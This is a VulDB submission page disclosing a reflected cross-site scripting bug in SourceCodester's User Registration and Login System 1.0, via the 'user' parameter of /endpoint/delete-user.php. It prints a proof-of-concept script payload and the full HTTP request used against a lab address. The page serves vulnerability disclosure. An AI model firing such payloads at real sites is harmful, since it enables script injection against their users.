Submit #246052: https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacksinfo

Titelhttps://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacks
BeschreibungUser Registration and Login System by rems has xss (Reflected XSS) BUG_Author: hlhyp vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html Vulnerability File: /endpoint/delete-user.php [+] payload: /endpoint/delete-user.php?user=1'"()%26%25<ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> GET /endpoint/delete-user.php?user=1'"()%26%25<zzz><ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> HTTP/1.1 Referer: http://192.168.6.1/ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: 192.168.6.1 Connection: Keep-alive
Quelle⚠️ https://github.com/qqisee/vulndis/blob/main/xss_delete_user.md
Benutzer
 hlhyp (UID 59415)
Einreichung01.12.2023 09:24 (vor 3 Jahren)
Moderieren01.12.2023 17:05 (8 hours later)
StatusAkzeptiert
VulDB Eintrag246612 [SourceCodester User Registration and Login System 1.0 delete-user.php Benutzer Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Want to stay up to date on a daily basis?

Enable the mail alert feature now!